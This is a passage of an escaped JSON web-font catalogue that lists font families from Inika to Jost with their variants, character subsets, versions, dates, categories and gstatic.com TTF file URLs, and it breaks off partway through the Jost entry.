\"family\": \"Inika\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/inika/v21/rnCm-x5X3QP-phTHRcc2s2XH.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/inika/v21/rnCr-x5X3QP-pix7auM-mHnOSOuk.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Inknut Antiqua\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/inknutantiqua/v14/Y4GRYax7VC4ot_qNB4nYpBdaKU2vwrj5bBoIYJNf.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/inknutantiqua/v14/Y4GSYax7VC4ot_qNB4nYpBdaKXUD6pzxRwYB.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/inknutantiqua/v14/Y4GRYax7VC4ot_qNB4nYpBdaKU33w7j5bBoIYJNf.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/inknutantiqua/v14/Y4GRYax7VC4ot_qNB4nYpBdaKU3bxLj5bBoIYJNf.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/inknutantiqua/v14/Y4GRYax7VC4ot_qNB4nYpBdaKU2_xbj5bBoIYJNf.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/inknutantiqua/v14/Y4GRYax7VC4ot_qNB4nYpBdaKU2jxrj5bBoIYJNf.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/inknutantiqua/v14/Y4GRYax7VC4ot_qNB4nYpBdaKU2Hx7j5bBoIYJNf.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Inria Sans\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/inriasans/v14/ptRPTiqXYfZMCOiVj9kQ3ELaDQtFqeY3fX4.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/inriasans/v14/ptRRTiqXYfZMCOiVj9kQ1OzAgQlPrcQybX4pQA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/inriasans/v14/ptRMTiqXYfZMCOiVj9kQ5O7yKQNute8.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/inriasans/v14/ptROTiqXYfZMCOiVj9kQ1Oz4LSFrpe8uZA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/inriasans/v14/ptRPTiqXYfZMCOiVj9kQ3FLdDQtFqeY3fX4.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/inriasans/v14/ptRRTiqXYfZMCOiVj9kQ1OzAkQ5PrcQybX4pQA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Inria Serif\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/inriaserif/v14/fC14PYxPY3rXxEndZJAzN3wAVQjFhFyta3xN.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/inriaserif/v14/fC16PYxPY3rXxEndZJAzN3SuT4THjliPbmxN0_E.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/inriaserif/v14/fC1lPYxPY3rXxEndZJAzN0SsfSzNr0Ck.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/inriaserif/v14/fC1nPYxPY3rXxEndZJAzN3SudyjvqlCkcmU.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/inriaserif/v14/fC14PYxPY3rXxEndZJAzN3wQUgjFhFyta3xN.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/inriaserif/v14/fC16PYxPY3rXxEndZJAzN3SuT5TAjliPbmxN0_E.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Inspiration\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/inspiration/v3/x3dkckPPZa6L4wIg5cZOEvoGnSrlBBsy.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Inter\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyeMZhrib2Bg-4.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuDyfMZhrib2Bg-4.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuOKfMZhrib2Bg-4.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyfMZhrib2Bg-4.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuI6fMZhrib2Bg-4.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuGKYMZhrib2Bg-4.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuFuYMZhrib2Bg-4.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuDyYMZhrib2Bg-4.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuBWYMZhrib2Bg-4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Inter Tight\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2023-01-10\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/intertight/v2/NGSnv5HMAFg6IuGlBNMjxJEL2VmU3NS7Z2mjDw6qXCRToK8EPg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/intertight/v2/NGSnv5HMAFg6IuGlBNMjxJEL2VmU3NS7Z2mjjw-qXCRToK8EPg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/intertight/v2/NGSnv5HMAFg6IuGlBNMjxJEL2VmU3NS7Z2mjUQ-qXCRToK8EPg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/intertight/v2/NGSnv5HMAFg6IuGlBNMjxJEL2VmU3NS7Z2mjDw-qXCRToK8EPg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/intertight/v2/NGSnv5HMAFg6IuGlBNMjxJEL2VmU3NS7Z2mjPQ-qXCRToK8EPg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/intertight/v2/NGSnv5HMAFg6IuGlBNMjxJEL2VmU3NS7Z2mj0QiqXCRToK8EPg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/intertight/v2/NGSnv5HMAFg6IuGlBNMjxJEL2VmU3NS7Z2mj6AiqXCRToK8EPg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/intertight/v2/NGSnv5HMAFg6IuGlBNMjxJEL2VmU3NS7Z2mjjwiqXCRToK8EPg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/intertight/v2/NGSnv5HMAFg6IuGlBNMjxJEL2VmU3NS7Z2mjpgiqXCRToK8EPg.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/intertight/v2/NGShv5HMAFg6IuGlBNMjxLsC66ZMtb8hyW62x0xCHi5XgqoUPvi5.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/intertight/v2/NGShv5HMAFg6IuGlBNMjxLsC66ZMtb8hyW62x0zCHy5XgqoUPvi5.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/intertight/v2/NGShv5HMAFg6IuGlBNMjxLsC66ZMtb8hyW62x0wcHy5XgqoUPvi5.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/intertight/v2/NGShv5HMAFg6IuGlBNMjxLsC66ZMtb8hyW62x0xCHy5XgqoUPvi5.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/intertight/v2/NGShv5HMAFg6IuGlBNMjxLsC66ZMtb8hyW62x0xwHy5XgqoUPvi5.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/intertight/v2/NGShv5HMAFg6IuGlBNMjxLsC66ZMtb8hyW62x0ycGC5XgqoUPvi5.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/intertight/v2/NGShv5HMAFg6IuGlBNMjxLsC66ZMtb8hyW62x0ylGC5XgqoUPvi5.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/intertight/v2/NGShv5HMAFg6IuGlBNMjxLsC66ZMtb8hyW62x0zCGC5XgqoUPvi5.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/intertight/v2/NGShv5HMAFg6IuGlBNMjxLsC66ZMtb8hyW62x0zrGC5XgqoUPvi5.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Irish Grover\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/irishgrover/v23/buExpoi6YtLz2QW7LA4flVgf-P5Oaiw4cw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Island Moments\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/islandmoments/v3/NaPBcZfVGvBdxIt7Ar0qzkXJF-TGIohbZ6SY.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Istok Web\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/istokweb/v20/3qTvojGmgSyUukBzKslZAWF-9kIIaQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/istokweb/v20/3qTpojGmgSyUukBzKslpA2t61EcYaQ7F.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/istokweb/v20/3qTqojGmgSyUukBzKslhvU5a_mkUYBfcMw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/istokweb/v20/3qT0ojGmgSyUukBzKslpA1PG-2MQQhLMMygN.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Italiana\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/italiana/v16/QldNNTtLsx4E__B0XTmRY31Wx7Vv.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Italianno\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/italianno/v16/dg4n_p3sv6gCJkwzT6Rnj5YpQwM-gg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Itim\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/itim/v10/0nknC9ziJOYewARKkc7ZdwU.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Jacques Francois\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/jacquesfrancois/v20/ZXu9e04ZvKeOOHIe1TMahbcIU2cgmcPqoeRWfbs.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Jacques Francois Shadow\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/jacquesfrancoisshadow/v21/KR1FBtOz8PKTMk-kqdkLVrvR0ECFrB6Pin-2_q8VsHuV5ULS.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Jaldi\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/jaldi/v12/or3sQ67z0_CI30NUZpD_B6g8.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/jaldi/v12/or3hQ67z0_CI33voSbT3LLQ1niPn.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"JetBrains Mono\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8yK1jPVmUsaaDhw.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8SKxjPVmUsaaDhw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8lqxjPVmUsaaDhw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8yKxjPVmUsaaDhw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8-qxjPVmUsaaDhw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8FqtjPVmUsaaDhw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8L6tjPVmUsaaDhw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8SKtjPVmUsaaDhw.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO-Lf1OQk6OThxPA.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO8LflOQk6OThxPA.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO_VflOQk6OThxPA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO-LflOQk6OThxPA.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO-5flOQk6OThxPA.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO9VeVOQk6OThxPA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO9seVOQk6OThxPA.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO8LeVOQk6OThxPA.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Jim Nightshade\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/jimnightshade/v20/PlIkFlu9Pb08Q8HLM1PxmB0g-OS4V3qKaMxD.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Joan\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/joan/v1/ZXupe1oZsqWRbRdH8X1p_Ng.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Jockey One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/jockeyone/v15/HTxpL2g2KjCFj4x8WI6ArIb7HYOk4xc.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Jolly Lodger\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/jollylodger/v20/BXRsvFTAh_bGkA1uQ48dlB3VWerT3ZyuqA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Jomhuria\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/jomhuria/v18/Dxxp8j-TMXf-llKur2b1MOGbC3Dh.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Jomolhari\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"tibetan\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/jomolhari/v14/EvONzA1M1Iw_CBd2hsQCF1IZKq5INg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Josefin Sans\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/josefinsans/v25/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_DjRXMFrLgTsQV0.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/josefinsans/v25/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_LjQXMFrLgTsQV0.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/josefinsans/v25/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_GbQXMFrLgTsQV0.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/josefinsans/v25/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_DjQXMFrLgTsQV0.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/josefinsans/v25/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_ArQXMFrLgTsQV0.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/josefinsans/v25/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_ObXXMFrLgTsQV0.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/josefinsans/v25/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_N_XXMFrLgTsQV0.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/josefinsans/v25/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTtINhKibpUV3MEQ.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/josefinsans/v25/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTNIJhKibpUV3MEQ.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/josefinsans/v25/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCT6oJhKibpUV3MEQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/josefinsans/v25/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTtIJhKibpUV3MEQ.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/josefinsans/v25/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCThoJhKibpUV3MEQ.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/josefinsans/v25/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTaoVhKibpUV3MEQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/josefinsans/v25/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTU4VhKibpUV3MEQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Josefin Slab\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-07-12\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/josefinslab/v20/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W71mtd3k3K6CcEyI.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/josefinslab/v20/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W79msd3k3K6CcEyI.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/josefinslab/v20/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W7wesd3k3K6CcEyI.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/josefinslab/v20/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W71msd3k3K6CcEyI.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/josefinslab/v20/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W72usd3k3K6CcEyI.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/josefinslab/v20/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W74erd3k3K6CcEyI.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/josefinslab/v20/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W776rd3k3K6CcEyI.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/josefinslab/v20/lW-qwjwOK3Ps5GSJlNNkMalnrxShJj4wo7AR-pHvnzs9L4KZAyK43w.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/josefinslab/v20/lW-qwjwOK3Ps5GSJlNNkMalnrxShJj4wo7AR-pHvHzo9L4KZAyK43w.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/josefinslab/v20/lW-qwjwOK3Ps5GSJlNNkMalnrxShJj4wo7AR-pHvwTo9L4KZAyK43w.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/josefinslab/v20/lW-qwjwOK3Ps5GSJlNNkMalnrxShJj4wo7AR-pHvnzo9L4KZAyK43w.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/josefinslab/v20/lW-qwjwOK3Ps5GSJlNNkMalnrxShJj4wo7AR-pHvrTo9L4KZAyK43w.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/josefinslab/v20/lW-qwjwOK3Ps5GSJlNNkMalnrxShJj4wo7AR-pHvQT09L4KZAyK43w.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/josefinslab/v20/lW-qwjwOK3Ps5GSJlNNkMalnrxShJj4wo7AR-pHveD09L4KZAyK43w.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Jost\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        